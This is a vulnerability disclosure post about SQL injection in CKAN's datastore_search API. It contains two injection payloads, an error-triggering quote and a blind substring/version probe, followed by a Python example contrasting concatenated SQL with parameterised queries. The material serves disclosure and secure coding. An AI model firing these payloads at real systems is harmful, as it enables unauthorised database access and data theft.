[CKAN-Security] SQL Injection Vulnerability

Gonzalo Garcia | ODS Red Team gonzalo.g at opendatasecurity.io
Fri Jun 8 10:37:40 UTC 2018


Hi, I've found a SQL injection vulnerability on /api/3/action/datastore_search. I've exploited it on the "q" parameter, but maybe other parameters are affected too.

Example POST data:
Query fails
{"resource_id":"38a8888c-30fd-4002-810e-6b7fe87a6fb2","q":" ' " ,"filters":{},"limit":100,"offset":0}

Query doesn't fail because the PostgreSQL version string is "PostgreSQL..." and "o" is the second character of the string.
{"resource_id":"38a8888c-30fd-4002-810e-6b7fe87a6fb2","q":"'|| (SELECT CASE substr(version(),2,1) WHEN 'o' THEN 'A' ELSE sleep(5) END) ||'" ,"filters":{},"limit":100,"offset":0}
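Added illustration, not code from the report and not CKAN's own datastore implementation: the snippet below uses an in-memory SQLite table (constructed sample data) to contrast a hypothetical search that splices the caller's "q" value into the SQL text, which is what produces the "query fails" behaviour described above, with a bound-parameter query that hands the same input to the driver as a literal. The table layout, the LIKE-based search, and the function names are assumptions made for the example.

```python
import sqlite3

# Constructed stand-in for a datastore resource table; not CKAN's schema.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE resource (id INTEGER, name TEXT)")
    conn.executemany("INSERT INTO resource VALUES (?, ?)",
                     [(1, "alpha"), (2, "beta")])
    return conn

def search_unsafe(conn, q):
    # Hypothetical vulnerable pattern: the user-supplied q becomes part of
    # the SQL text, so a stray quote changes the statement's structure and
    # the database reports a syntax error (the "query fails" oracle).
    sql = "SELECT id, name FROM resource WHERE name LIKE '%" + q + "%'"
    return conn.execute(sql).fetchall()

def search_safe(conn, q):
    # Hardened form: q is bound as a parameter; the driver never parses it
    # as SQL, so quotes and operators inside it are just characters to match.
    sql = "SELECT id, name FROM resource WHERE name LIKE ?"
    return conn.execute(sql, ("%" + q + "%",)).fetchall()

def probe(search_fn, q):
    # Run one search against a fresh database and report whether the
    # statement executed or the database rejected it.
    conn = make_db()
    try:
        return ("ok", search_fn(conn, q))
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))
    finally:
        conn.close()

if __name__ == "__main__":
    # The report's first payload: a lone quote makes the spliced query fail,
    # while the parameterised query simply finds no matching rows.
    print(probe(search_unsafe, " ' "))
    print(probe(search_safe, " ' "))
    print(probe(search_safe, "alph"))
```

The difference to look for in an application: with parameter binding, malformed input changes the result set, never the statement, so no input value can make the query itself succeed or fail conditionally. That removes both the error-based and the timing-based signal the report relies on.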